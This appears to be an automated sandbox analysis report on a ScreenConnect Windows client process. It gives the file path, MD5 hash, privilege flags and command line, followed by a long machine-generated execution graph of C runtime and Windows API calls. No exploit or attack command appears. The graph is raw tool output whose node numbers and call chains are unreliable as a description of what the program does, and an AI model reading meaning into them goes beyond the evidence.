                                                                                                                                                                                                                                                      File size:600'864 bytes
                                                                                                                                                                                                                                                      MD5 hash:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                                                                      Start time:13:29:54
                                                                                                                                                                                                                                                      Start date:25/10/2024
                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "a9f9cad7-92f3-4145-a572-df5ab2869f06" "System"
                                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                      File size:600'864 bytes
                                                                                                                                                                                                                                                      MD5 hash:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:2.2%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                        Signature Coverage:3.8%
                                                                                                                                                                                                                                                        Total number of Nodes:1465
                                                                                                                                                                                                                                                        Total number of Limit Nodes:4
5228 ac445a 5231 ac4869 _free 15 API calls 5228->5231 5230 ac446f 5230->5228 5232 ac4476 5230->5232 5233 ac4460 5231->5233 5301 ac4296 5232->5301 5234 ac449b SetLastError 5233->5234 5306 ac3f24 5234->5306 5238 ac4869 _free 15 API calls 5240 ac4488 5238->5240 5240->5227 5240->5234 5242 ac5255 ___scrt_is_nonwritable_in_current_image 5241->5242 5243 ac4424 _abort 33 API calls 5242->5243 5245 ac525f 5243->5245 5246 ac52e3 _abort 5245->5246 5248 ac3f24 _abort 33 API calls 5245->5248 5249 ac4869 _free 15 API calls 5245->5249 5542 ac56e2 EnterCriticalSection 5245->5542 5543 ac52da 5245->5543 5246->5205 5248->5245 5249->5245 5547 ac3f72 5250->5547 5253 ac4edf GetOEMCP 5255 ac4f08 5253->5255 5254 ac4ef1 5254->5255 5256 ac4ef6 GetACP 5254->5256 5255->5208 5257 ac62ff 5255->5257 5256->5255 5258 ac633d 5257->5258 5262 ac630d _abort 5257->5262 5259 ac47f9 _free 15 API calls 5258->5259 5261 ac5167 5259->5261 5260 ac6328 HeapAlloc 5260->5261 5260->5262 5261->5211 5264 ac52eb 5261->5264 5262->5258 5262->5260 5263 ac6992 _abort 2 API calls 5262->5263 5263->5262 5265 ac4ebe 35 API calls 5264->5265 5267 ac530a 5265->5267 5266 ac5311 _ValidateLocalCookies 5266->5214 5267->5266 5268 ac535b IsValidCodePage 5267->5268 5271 ac5380 _abort 5267->5271 5268->5266 5269 ac536d GetCPInfo 5268->5269 5269->5266 5269->5271 5584 ac4f96 GetCPInfo 5271->5584 5273 ac44a8 _abort 15 API calls 5272->5273 5274 ac47fe 5273->5274 5274->5211 5276 ac4874 HeapFree 5275->5276 5280 ac489d _free 5275->5280 5277 ac4889 5276->5277 5276->5280 5278 ac47f9 _free 13 API calls 5277->5278 5279 ac488f GetLastError 5278->5279 5279->5280 5280->5208 5647 ac4d51 5281->5647 5283 ac4db8 5283->5211 5317 ac5741 5284->5317 5286 ac592b 5287 ac5943 TlsGetValue 5286->5287 5288 ac5937 _ValidateLocalCookies 5286->5288 5287->5288 5288->5223 5294 ac4819 _abort 5289->5294 5290 ac4859 5292 ac47f9 _free 14 API calls 5290->5292 5291 ac4844 HeapAlloc 5293 ac4452 5291->5293 5291->5294 5292->5293 5293->5228 5296 ac595a 5293->5296 5294->5290 
5294->5291 5330 ac6992 5294->5330 5297 ac5741 _abort 5 API calls 5296->5297 5298 ac5981 5297->5298 5299 ac599c TlsSetValue 5298->5299 5300 ac5990 _ValidateLocalCookies 5298->5300 5299->5300 5300->5230 5344 ac426e 5301->5344 5452 ac6b14 5306->5452 5309 ac3f35 5311 ac3f3e IsProcessorFeaturePresent 5309->5311 5316 ac3f5c 5309->5316 5313 ac3f49 5311->5313 5312 ac3793 _abort 23 API calls 5314 ac3f66 5312->5314 5480 ac4573 5313->5480 5316->5312 5321 ac576d 5317->5321 5322 ac5771 _abort 5317->5322 5318 ac5791 5320 ac579d GetProcAddress 5318->5320 5318->5322 5320->5322 5321->5318 5321->5322 5323 ac57dd 5321->5323 5322->5286 5324 ac57fe LoadLibraryExW 5323->5324 5329 ac57f3 5323->5329 5325 ac581b GetLastError 5324->5325 5326 ac5833 5324->5326 5325->5326 5327 ac5826 LoadLibraryExW 5325->5327 5328 ac584a FreeLibrary 5326->5328 5326->5329 5327->5326 5328->5329 5329->5321 5333 ac69d6 5330->5333 5332 ac69a8 _ValidateLocalCookies 5332->5294 5334 ac69e2 ___scrt_is_nonwritable_in_current_image 5333->5334 5339 ac56e2 EnterCriticalSection 5334->5339 5336 ac69ed 5340 ac6a1f 5336->5340 5338 ac6a14 _abort 5338->5332 5339->5336 5343 ac572a LeaveCriticalSection 5340->5343 5342 ac6a26 5342->5338 5343->5342 5350 ac41ae 5344->5350 5346 ac4292 5347 ac421e 5346->5347 5361 ac40b2 5347->5361 5349 ac4242 5349->5238 5351 ac41ba ___scrt_is_nonwritable_in_current_image 5350->5351 5356 ac56e2 EnterCriticalSection 5351->5356 5353 ac41c4 5357 ac41ea 5353->5357 5355 ac41e2 _abort 5355->5346 5356->5353 5360 ac572a LeaveCriticalSection 5357->5360 5359 ac41f4 5359->5355 5360->5359 5362 ac40be ___scrt_is_nonwritable_in_current_image 5361->5362 5369 ac56e2 EnterCriticalSection 5362->5369 5364 ac40c8 5370 ac43d9 5364->5370 5366 ac40e0 5374 ac40f6 5366->5374 5368 ac40ee _abort 5368->5349 5369->5364 5371 ac440f __fassign 5370->5371 5372 ac43e8 __fassign 5370->5372 5371->5366 5372->5371 5377 ac6507 5372->5377 5451 ac572a LeaveCriticalSection 5374->5451 5376 ac4100 5376->5368 5378 ac651d 5377->5378 5380 ac6587 
5377->5380 5378->5380 5382 ac6550 5378->5382 5387 ac4869 _free 15 API calls 5378->5387 5381 ac4869 _free 15 API calls 5380->5381 5404 ac65d5 5380->5404 5383 ac65a9 5381->5383 5384 ac6572 5382->5384 5392 ac4869 _free 15 API calls 5382->5392 5385 ac4869 _free 15 API calls 5383->5385 5386 ac4869 _free 15 API calls 5384->5386 5388 ac65bc 5385->5388 5389 ac657c 5386->5389 5391 ac6545 5387->5391 5393 ac4869 _free 15 API calls 5388->5393 5394 ac4869 _free 15 API calls 5389->5394 5390 ac6643 5395 ac4869 _free 15 API calls 5390->5395 5405 ac6078 5391->5405 5397 ac6567 5392->5397 5398 ac65ca 5393->5398 5394->5380 5400 ac6649 5395->5400 5433 ac6176 5397->5433 5402 ac4869 _free 15 API calls 5398->5402 5399 ac65e3 5399->5390 5403 ac4869 15 API calls _free 5399->5403 5400->5371 5402->5404 5403->5399 5445 ac667a 5404->5445 5406 ac6089 5405->5406 5432 ac6172 5405->5432 5407 ac609a 5406->5407 5408 ac4869 _free 15 API calls 5406->5408 5409 ac60ac 5407->5409 5410 ac4869 _free 15 API calls 5407->5410 5408->5407 5411 ac60be 5409->5411 5413 ac4869 _free 15 API calls 5409->5413 5410->5409 5412 ac60d0 5411->5412 5414 ac4869 _free 15 API calls 5411->5414 5415 ac60e2 5412->5415 5416 ac4869 _free 15 API calls 5412->5416 5413->5411 5414->5412 5417 ac4869 _free 15 API calls 5415->5417 5418 ac60f4 5415->5418 5416->5415 5417->5418 5420 ac6106 5418->5420 5421 ac4869 _free 15 API calls 5418->5421 5419 ac6118 5423 ac612a 5419->5423 5424 ac4869 _free 15 API calls 5419->5424 5420->5419 5422 ac4869 _free 15 API calls 5420->5422 5421->5420 5422->5419 5425 ac613c 5423->5425 5426 ac4869 _free 15 API calls 5423->5426 5424->5423 5427 ac614e 5425->5427 5429 ac4869 _free 15 API calls 5425->5429 5426->5425 5428 ac6160 5427->5428 5430 ac4869 _free 15 API calls 5427->5430 5431 ac4869 _free 15 API calls 5428->5431 5428->5432 5429->5427 5430->5428 5431->5432 5432->5382 5434 ac61db 5433->5434 5435 ac6183 5433->5435 5434->5384 5436 ac6193 5435->5436 5437 ac4869 _free 15 API calls 5435->5437 5438 ac61a5 5436->5438 
5439 ac4869 _free 15 API calls 5436->5439 5437->5436 5440 ac61b7 5438->5440 5442 ac4869 _free 15 API calls 5438->5442 5439->5438 5441 ac61c9 5440->5441 5443 ac4869 _free 15 API calls 5440->5443 5441->5434 5444 ac4869 _free 15 API calls 5441->5444 5442->5440 5443->5441 5444->5434 5446 ac66a5 5445->5446 5447 ac6687 5445->5447 5446->5399 5447->5446 5448 ac621b __fassign 15 API calls 5447->5448 5449 ac669f 5448->5449 5450 ac4869 _free 15 API calls 5449->5450 5450->5446 5451->5376 5484 ac6a82 5452->5484 5455 ac6b6f 5456 ac6b7b _abort 5455->5456 5459 ac6ba2 _abort 5456->5459 5462 ac6ba8 _abort 5456->5462 5498 ac44a8 GetLastError 5456->5498 5458 ac6bf4 5460 ac47f9 _free 15 API calls 5458->5460 5459->5458 5459->5462 5464 ac6bd7 _abort 5459->5464 5461 ac6bf9 5460->5461 5517 ac473d 5461->5517 5468 ac6c20 5462->5468 5520 ac56e2 EnterCriticalSection 5462->5520 5464->5309 5467 ac6c77 5470 ac3793 _abort 23 API calls 5467->5470 5468->5467 5472 ac6c7f 5468->5472 5477 ac6caa 5468->5477 5521 ac572a LeaveCriticalSection 5468->5521 5470->5472 5472->5477 5522 ac6b66 5472->5522 5474 ac4424 _abort 33 API calls 5478 ac6d0d 5474->5478 5476 ac6b66 _abort 33 API calls 5476->5477 5525 ac6d2f 5477->5525 5478->5464 5479 ac4424 _abort 33 API calls 5478->5479 5479->5464 5481 ac458f _abort 5480->5481 5482 ac45bb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5481->5482 5483 ac468c _abort _ValidateLocalCookies 5482->5483 5483->5316 5487 ac6a28 5484->5487 5486 ac3f29 5486->5309 5486->5455 5488 ac6a34 ___scrt_is_nonwritable_in_current_image 5487->5488 5493 ac56e2 EnterCriticalSection 5488->5493 5490 ac6a42 5494 ac6a76 5490->5494 5492 ac6a69 _abort 5492->5486 5493->5490 5497 ac572a LeaveCriticalSection 5494->5497 5496 ac6a80 5496->5492 5497->5496 5499 ac44c7 5498->5499 5500 ac44c1 5498->5500 5502 ac480c _abort 12 API calls 5499->5502 5504 ac451e SetLastError 5499->5504 5501 ac5904 _abort 6 API calls 5500->5501 5501->5499 5503 ac44d9 5502->5503 5505 ac44e1 5503->5505 5507 ac595a 
_abort 6 API calls 5503->5507 5506 ac4527 5504->5506 5508 ac4869 _free 12 API calls 5505->5508 5506->5459 5509 ac44f6 5507->5509 5510 ac44e7 5508->5510 5509->5505 5511 ac44fd 5509->5511 5513 ac4515 SetLastError 5510->5513 5512 ac4296 _abort 12 API calls 5511->5512 5514 ac4508 5512->5514 5513->5506 5515 ac4869 _free 12 API calls 5514->5515 5516 ac450e 5515->5516 5516->5504 5516->5513 5529 ac46c2 5517->5529 5519 ac4749 5519->5464 5520->5468 5521->5467 5523 ac4424 _abort 33 API calls 5522->5523 5524 ac6b6b 5523->5524 5524->5476 5526 ac6cfe 5525->5526 5527 ac6d35 5525->5527 5526->5464 5526->5474 5526->5478 5541 ac572a LeaveCriticalSection 5527->5541 5530 ac44a8 _abort 15 API calls 5529->5530 5531 ac46d8 5530->5531 5534 ac46e6 _ValidateLocalCookies 5531->5534 5537 ac474d IsProcessorFeaturePresent 5531->5537 5533 ac473c 5535 ac46c2 _abort 21 API calls 5533->5535 5534->5519 5536 ac4749 5535->5536 5536->5519 5538 ac4758 5537->5538 5539 ac4573 _abort 3 API calls 5538->5539 5540 ac476d GetCurrentProcess TerminateProcess 5539->5540 5540->5533 5541->5526 5542->5245 5546 ac572a LeaveCriticalSection 5543->5546 5545 ac52e1 5545->5245 5546->5545 5548 ac3f8f 5547->5548 5549 ac3f85 5547->5549 5548->5549 5550 ac4424 _abort 33 API calls 5548->5550 5549->5253 5549->5254 5551 ac3fb0 5550->5551 5555 ac72d1 5551->5555 5556 ac72e4 5555->5556 5558 ac3fc9 5555->5558 5556->5558 5563 ac6754 5556->5563 5559 ac72fe 5558->5559 5560 ac7326 5559->5560 5561 ac7311 5559->5561 5560->5549 5561->5560 5562 ac5249 __fassign 33 API calls 5561->5562 5562->5560 5564 ac6760 ___scrt_is_nonwritable_in_current_image 5563->5564 5565 ac4424 _abort 33 API calls 5564->5565 5566 ac6769 5565->5566 5569 ac67b7 _abort 5566->5569 5575 ac56e2 EnterCriticalSection 5566->5575 5568 ac6787 5576 ac67cb 5568->5576 5569->5558 5574 ac3f24 _abort 33 API calls 5574->5569 5575->5568 5577 ac67d9 __fassign 5576->5577 5579 ac679b 5576->5579 5578 ac6507 __fassign 15 API calls 5577->5578 5577->5579 5578->5579 5580 ac67ba 5579->5580 5583 
ac572a LeaveCriticalSection 5580->5583 5582 ac67ae 5582->5569 5582->5574 5583->5582 5587 ac4fd0 5584->5587 5591 ac507a _ValidateLocalCookies 5584->5591 5586 ac5031 5604 ac7cd1 5586->5604 5592 ac634d 5587->5592 5590 ac7cd1 38 API calls 5590->5591 5591->5266 5593 ac3f72 __fassign 33 API calls 5592->5593 5594 ac636d MultiByteToWideChar 5593->5594 5596 ac63ab 5594->5596 5597 ac6443 _ValidateLocalCookies 5594->5597 5598 ac63cc _abort __alloca_probe_16 5596->5598 5599 ac62ff 16 API calls 5596->5599 5597->5586 5600 ac643d 5598->5600 5602 ac6411 MultiByteToWideChar 5598->5602 5599->5598 5609 ac646a 5600->5609 5602->5600 5603 ac642d GetStringTypeW 5602->5603 5603->5600 5605 ac3f72 __fassign 33 API calls 5604->5605 5606 ac7ce4 5605->5606 5613 ac7ab4 5606->5613 5608 ac5052 5608->5590 5610 ac6487 5609->5610 5611 ac6476 5609->5611 5610->5597 5611->5610 5612 ac4869 _free 15 API calls 5611->5612 5612->5610 5614 ac7acf 5613->5614 5615 ac7af5 MultiByteToWideChar 5614->5615 5616 ac7ca9 _ValidateLocalCookies 5615->5616 5617 ac7b1f 5615->5617 5616->5608 5618 ac62ff 16 API calls 5617->5618 5622 ac7b40 __alloca_probe_16 5617->5622 5618->5622 5619 ac7b89 MultiByteToWideChar 5620 ac7bf5 5619->5620 5621 ac7ba2 5619->5621 5624 ac646a __freea 15 API calls 5620->5624 5638 ac5a15 5621->5638 5622->5619 5622->5620 5624->5616 5625 ac7bb9 5625->5620 5626 ac7bcc 5625->5626 5627 ac7c04 5625->5627 5626->5620 5629 ac5a15 6 API calls 5626->5629 5628 ac62ff 16 API calls 5627->5628 5631 ac7c25 __alloca_probe_16 5627->5631 5628->5631 5629->5620 5630 ac7c9a 5633 ac646a __freea 15 API calls 5630->5633 5631->5630 5632 ac5a15 6 API calls 5631->5632 5634 ac7c79 5632->5634 5633->5620 5634->5630 5635 ac7c88 WideCharToMultiByte 5634->5635 5635->5630 5636 ac7cc8 5635->5636 5637 ac646a __freea 15 API calls 5636->5637 5637->5620 5639 ac5741 _abort 5 API calls 5638->5639 5640 ac5a3c 5639->5640 5641 ac5a45 _ValidateLocalCookies 5640->5641 5644 ac5a9d 5640->5644 5641->5625 5643 ac5a85 LCMapStringW 5643->5641 5645 
ac5741 _abort 5 API calls 5644->5645 5646 ac5ac4 _ValidateLocalCookies 5645->5646 5646->5643 5648 ac4d5d ___scrt_is_nonwritable_in_current_image 5647->5648 5655 ac56e2 EnterCriticalSection 5648->5655 5650 ac4d67 5656 ac4dbc 5650->5656 5654 ac4d80 _abort 5654->5283 5655->5650 5668 ac54dc 5656->5668 5658 ac4e0a 5659 ac54dc 21 API calls 5658->5659 5660 ac4e26 5659->5660 5661 ac54dc 21 API calls 5660->5661 5662 ac4e44 5661->5662 5663 ac4d74 5662->5663 5664 ac4869 _free 15 API calls 5662->5664 5665 ac4d88 5663->5665 5664->5663 5682 ac572a LeaveCriticalSection 5665->5682 5667 ac4d92 5667->5654 5669 ac54ed 5668->5669 5678 ac54e9 5668->5678 5670 ac54f4 5669->5670 5671 ac5507 _abort 5669->5671 5672 ac47f9 _free 15 API calls 5670->5672 5675 ac553e 5671->5675 5676 ac5535 5671->5676 5671->5678 5673 ac54f9 5672->5673 5674 ac473d _abort 21 API calls 5673->5674 5674->5678 5675->5678 5679 ac47f9 _free 15 API calls 5675->5679 5677 ac47f9 _free 15 API calls 5676->5677 5680 ac553a 5677->5680 5678->5658 5679->5680 5681 ac473d _abort 21 API calls 5680->5681 5681->5678 5682->5667 5684 ac3f72 __fassign 33 API calls 5683->5684 5685 ac5571 5684->5685 5685->5074 5687 ac356a _abort 5686->5687 5688 ac3582 5687->5688 5701 ac36b8 GetModuleHandleW 5687->5701 5708 ac56e2 EnterCriticalSection 5688->5708 5694 ac358a 5699 ac35ff _abort 5694->5699 5709 ac3c97 5694->5709 5696 ac3671 _abort 5696->5107 5712 ac3668 5699->5712 5702 ac3576 5701->5702 5702->5688 5703 ac36fc GetModuleHandleExW 5702->5703 5704 ac3726 GetProcAddress 5703->5704 5707 ac373b 5703->5707 5704->5707 5705 ac374f FreeLibrary 5706 ac3758 _ValidateLocalCookies 5705->5706 5706->5688 5707->5705 5707->5706 5708->5694 5723 ac39d0 5709->5723 5743 ac572a LeaveCriticalSection 5712->5743 5714 ac3641 5714->5696 5715 ac3677 5714->5715 5744 ac5b1f 5715->5744 5717 ac3681 5718 ac36a5 5717->5718 5719 ac3685 GetPEB 5717->5719 5721 ac36fc _abort 3 API calls 5718->5721 5719->5718 5720 ac3695 GetCurrentProcess TerminateProcess 5719->5720 5720->5718 5722 
ac36ad ExitProcess 5721->5722 5726 ac397f 5723->5726 5725 ac39f4 5725->5699 5727 ac398b ___scrt_is_nonwritable_in_current_image 5726->5727 5734 ac56e2 EnterCriticalSection 5727->5734 5729 ac3999 5735 ac3a20 5729->5735 5731 ac39a6 5739 ac39c4 5731->5739 5733 ac39b7 _abort 5733->5725 5734->5729 5736 ac3a48 5735->5736 5738 ac3a40 _ValidateLocalCookies 5735->5738 5737 ac4869 _free 15 API calls 5736->5737 5736->5738 5737->5738 5738->5731 5742 ac572a LeaveCriticalSection 5739->5742 5741 ac39ce 5741->5733 5742->5741 5743->5714 5745 ac5b44 5744->5745 5747 ac5b3a _ValidateLocalCookies 5744->5747 5746 ac5741 _abort 5 API calls 5745->5746 5746->5747 5747->5717 6605 ac324d 6606 ac522b 46 API calls 6605->6606 6607 ac325f 6606->6607 6616 ac561e GetEnvironmentStringsW 6607->6616 6610 ac326a 6612 ac4869 _free 15 API calls 6610->6612 6613 ac329f 6612->6613 6614 ac3275 6615 ac4869 _free 15 API calls 6614->6615 6615->6610 6617 ac5635 6616->6617 6627 ac5688 6616->6627 6620 ac563b WideCharToMultiByte 6617->6620 6618 ac3264 6618->6610 6628 ac32a5 6618->6628 6619 ac5691 FreeEnvironmentStringsW 6619->6618 6621 ac5657 6620->6621 6620->6627 6622 ac62ff 16 API calls 6621->6622 6623 ac565d 6622->6623 6624 ac5664 WideCharToMultiByte 6623->6624 6625 ac567a 6623->6625 6624->6625 6626 ac4869 _free 15 API calls 6625->6626 6626->6627 6627->6618 6627->6619 6629 ac32ba 6628->6629 6630 ac480c _abort 15 API calls 6629->6630 6631 ac32e1 6630->6631 6632 ac3345 6631->6632 6635 ac480c _abort 15 API calls 6631->6635 6636 ac3347 6631->6636 6641 ac3369 6631->6641 6643 ac4869 _free 15 API calls 6631->6643 6645 ac3eca 6631->6645 6633 ac4869 _free 15 API calls 6632->6633 6634 ac335f 6633->6634 6634->6614 6635->6631 6637 ac3376 15 API calls 6636->6637 6639 ac334d 6637->6639 6640 ac4869 _free 15 API calls 6639->6640 6640->6632 6642 ac474d _abort 6 API calls 6641->6642 6644 ac3375 6642->6644 6643->6631 6646 ac3ee5 6645->6646 6647 ac3ed7 6645->6647 6648 ac47f9 _free 15 API calls 6646->6648 6647->6646 6650 ac3efc 
6647->6650 6653 ac3eed 6648->6653 6649 ac473d _abort 21 API calls 6651 ac3ef7 6649->6651 6650->6651 6652 ac47f9 _free 15 API calls 6650->6652 6651->6631 6652->6653 6653->6649 6055 ac55ce GetCommandLineA GetCommandLineW 5879 ac3d8f 5881 ac3d9e 5879->5881 5884 ac3db2 5879->5884 5880 ac4869 _free 15 API calls 5882 ac3dc4 5880->5882 5883 ac4869 _free 15 API calls 5881->5883 5881->5884 5885 ac4869 _free 15 API calls 5882->5885 5883->5884 5884->5880 5886 ac3dd7 5885->5886 5887 ac4869 _free 15 API calls 5886->5887 5888 ac3de8 5887->5888 5889 ac4869 _free 15 API calls 5888->5889 5890 ac3df9 5889->5890 6177 ac430f 6178 ac431a 6177->6178 6182 ac432a 6177->6182 6183 ac4330 6178->6183 6181 ac4869 _free 15 API calls 6181->6182 6184 ac4349 6183->6184 6185 ac4343 6183->6185 6187 ac4869 _free 15 API calls 6184->6187 6186 ac4869 _free 15 API calls 6185->6186 6186->6184 6188 ac4355 6187->6188 6189 ac4869 _free 15 API calls 6188->6189 6190 ac4360 6189->6190 6191 ac4869 _free 15 API calls 6190->6191 6192 ac436b 6191->6192 6193 ac4869 _free 15 API calls 6192->6193 6194 ac4376 6193->6194 6195 ac4869 _free 15 API calls 6194->6195 6196 ac4381 6195->6196 6197 ac4869 _free 15 API calls 6196->6197 6198 ac438c 6197->6198 6199 ac4869 _free 15 API calls 6198->6199 6200 ac4397 6199->6200 6201 ac4869 _free 15 API calls 6200->6201 6202 ac43a2 6201->6202 6203 ac4869 _free 15 API calls 6202->6203 6204 ac43b0 6203->6204 6209 ac41f6 6204->6209 6215 ac4102 6209->6215 6211 ac421a 6212 ac4246 6211->6212 6228 ac4163 6212->6228 6214 ac426a 6214->6181 6216 ac410e ___scrt_is_nonwritable_in_current_image 6215->6216 6223 ac56e2 EnterCriticalSection 6216->6223 6218 ac4118 6221 ac4869 _free 15 API calls 6218->6221 6222 ac4142 6218->6222 6220 ac414f _abort 6220->6211 6221->6222 6224 ac4157 6222->6224 6223->6218 6227 ac572a LeaveCriticalSection 6224->6227 6226 ac4161 6226->6220 6227->6226 6229 ac416f ___scrt_is_nonwritable_in_current_image 6228->6229 6236 ac56e2 EnterCriticalSection 6229->6236 6231 ac4179 6232 
ac43d9 _abort 15 API calls 6231->6232 6233 ac418c 6232->6233 6237 ac41a2 6233->6237 6235 ac419a _abort 6235->6214 6236->6231 6240 ac572a LeaveCriticalSection 6237->6240 6239 ac41ac 6239->6235 6240->6239 6654 ac1248 6655 ac1250 6654->6655 6671 ac37f7 6655->6671 6657 ac125b 6678 ac1664 6657->6678 6659 ac191f 4 API calls 6661 ac12f2 6659->6661 6660 ac1270 __RTC_Initialize 6669 ac12cd 6660->6669 6684 ac17f1 6660->6684 6663 ac1289 6663->6669 6687 ac18ab InitializeSListHead 6663->6687 6665 ac129f 6688 ac18ba 6665->6688 6667 ac12c2 6694 ac3891 6667->6694 6669->6659 6670 ac12ea 6669->6670 6672 ac3829 6671->6672 6673 ac3806 6671->6673 6672->6657 6673->6672 6674 ac47f9 _free 15 API calls 6673->6674 6675 ac3819 6674->6675 6676 ac473d _abort 21 API calls 6675->6676 6677 ac3824 6676->6677 6677->6657 6679 ac1674 6678->6679 6680 ac1670 6678->6680 6681 ac191f 4 API calls 6679->6681 6683 ac1681 ___scrt_release_startup_lock 6679->6683 6680->6660 6682 ac16ea 6681->6682 6683->6660 6701 ac17c4 6684->6701 6687->6665 6739 ac3e2a 6688->6739 6690 ac18cb 6691 ac18d2 6690->6691 6692 ac191f 4 API calls 6690->6692 6691->6667 6693 ac18da 6692->6693 6693->6667 6695 ac4424 _abort 33 API calls 6694->6695 6697 ac389c 6695->6697 6696 ac38d4 6696->6669 6697->6696 6698 ac47f9 _free 15 API calls 6697->6698 6699 ac38c9 6698->6699 6700 ac473d _abort 21 API calls 6699->6700 6700->6696 6702 ac17da 6701->6702 6703 ac17d3 6701->6703 6710 ac3cf1 6702->6710 6707 ac3c81 6703->6707 6706 ac17d8 6706->6663 6708 ac3cf1 24 API calls 6707->6708 6709 ac3c93 6708->6709 6709->6706 6713 ac39f8 6710->6713 6716 ac392e 6713->6716 6715 ac3a1c 6715->6706 6717 ac393a ___scrt_is_nonwritable_in_current_image 6716->6717 6724 ac56e2 EnterCriticalSection 6717->6724 6719 ac3948 6725 ac3b40 6719->6725 6721 ac3955 6735 ac3973 6721->6735 6723 ac3966 _abort 6723->6715 6724->6719 6726 ac3b5e 6725->6726 6733 ac3b56 _abort 6725->6733 6727 ac3bb7 6726->6727 6729 ac681b 24 API calls 6726->6729 6726->6733 6728 ac681b 24 API calls 6727->6728 
6727->6733 6731 ac3bcd 6728->6731 6730 ac3bad 6729->6730 6732 ac4869 _free 15 API calls 6730->6732 6734 ac4869 _free 15 API calls 6731->6734 6732->6727 6733->6721 6734->6733 6738 ac572a LeaveCriticalSection 6735->6738 6737 ac397d 6737->6723 6738->6737 6740 ac3e48 6739->6740 6744 ac3e68 6739->6744 6741 ac47f9 _free 15 API calls 6740->6741 6742 ac3e5e 6741->6742 6743 ac473d _abort 21 API calls 6742->6743 6743->6744 6744->6690 5891 ac1489 5894 ac1853 5891->5894 5893 ac148e 5893->5893 5895 ac1869 5894->5895 5897 ac1872 5895->5897 5898 ac1806 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 5895->5898 5897->5893 5898->5897 5899 ac4c8a 5904 ac4cbf 5899->5904 5902 ac4ca6 5903 ac4869 _free 15 API calls 5903->5902 5905 ac4cd1 5904->5905 5914 ac4c98 5904->5914 5906 ac4cd6 5905->5906 5907 ac4d01 5905->5907 5908 ac480c _abort 15 API calls 5906->5908 5907->5914 5915 ac681b 5907->5915 5909 ac4cdf 5908->5909 5911 ac4869 _free 15 API calls 5909->5911 5911->5914 5912 ac4d1c 5913 ac4869 _free 15 API calls 5912->5913 5913->5914 5914->5902 5914->5903 5916 ac6826 5915->5916 5917 ac684e 5916->5917 5918 ac683f 5916->5918 5919 ac685d 5917->5919 5924 ac7e13 5917->5924 5920 ac47f9 _free 15 API calls 5918->5920 5931 ac7e46 5919->5931 5923 ac6844 _abort 5920->5923 5923->5912 5925 ac7e1e 5924->5925 5926 ac7e33 HeapSize 5924->5926 5927 ac47f9 _free 15 API calls 5925->5927 5926->5919 5928 ac7e23 5927->5928 5929 ac473d _abort 21 API calls 5928->5929 5930 ac7e2e 5929->5930 5930->5919 5932 ac7e5e 5931->5932 5933 ac7e53 5931->5933 5934 ac7e66 5932->5934 5941 ac7e6f _abort 5932->5941 5935 ac62ff 16 API calls 5933->5935 5936 ac4869 _free 15 API calls 5934->5936 5939 ac7e5b 5935->5939 5936->5939 5937 ac7e99 HeapReAlloc 5937->5939 5937->5941 5938 ac7e74 5940 ac47f9 _free 15 API calls 5938->5940 5939->5923 5940->5939 5941->5937 5941->5938 5942 ac6992 _abort 2 API calls 5941->5942 5942->5941 6056 ac98c5 6058 ac98ed 6056->6058 6057 ac9925 6058->6057 6059 ac991e 
6058->6059 6060 ac9917 6058->6060 6065 ac9980 6059->6065 6062 ac9997 16 API calls 6060->6062 6064 ac991c 6062->6064 6066 ac99a0 6065->6066 6067 aca06f __startOneArgErrorHandling 16 API calls 6066->6067 6068 ac9923 6067->6068 5943 ac3d86 5944 ac1f7d ___scrt_uninitialize_crt 7 API calls 5943->5944 5945 ac3d8d 5944->5945 6745 ac9146 IsProcessorFeaturePresent 6241 ac3400 6242 ac3418 6241->6242 6243 ac3412 6241->6243 6244 ac3376 15 API calls 6243->6244 6244->6242 6245 ac1e00 6249 ac1e1e ___except_validate_context_record _ValidateLocalCookies __IsNonwritableInCurrentImage 6245->6249 6246 ac1e9e _ValidateLocalCookies 6248 ac1f27 _ValidateLocalCookies 6249->6246 6250 ac2340 RtlUnwind 6249->6250 6250->6248 6746 ac3d41 6749 ac341b 6746->6749 6750 ac342a 6749->6750 6751 ac3376 15 API calls 6750->6751 6752 ac3444 6751->6752 6753 ac3376 15 API calls 6752->6753 6754 ac344f 6753->6754 6755 ac1442 6756 ac1a6a GetModuleHandleW 6755->6756 6757 ac144a 6756->6757 6758 ac144e 6757->6758 6759 ac1480 6757->6759 6760 ac1459 6758->6760 6764 ac3775 6758->6764 6761 ac3793 _abort 23 API calls 6759->6761 6763 ac1488 6761->6763 6765 ac355e _abort 23 API calls 6764->6765 6766 ac3780 6765->6766 6766->6760 6069 ac9ec3 6070 ac9ecd 6069->6070 6071 ac9ed9 6069->6071 6070->6071 6072 ac9ed2 CloseHandle 6070->6072 6072->6071 6251 ac7d1c 6252 ac522b 46 API calls 6251->6252 6253 ac7d21 6252->6253 6767 ac365d 6768 ac3e89 33 API calls 6767->6768 6769 ac3665 6768->6769 6254 ac7419 6264 ac7fb2 6254->6264 6258 ac7426 6277 ac828e 6258->6277 6261 ac7450 6262 ac4869 _free 15 API calls 6261->6262 6263 ac745b 6262->6263 6281 ac7fbb 6264->6281 6266 ac7421 6267 ac81ee 6266->6267 6268 ac81fa 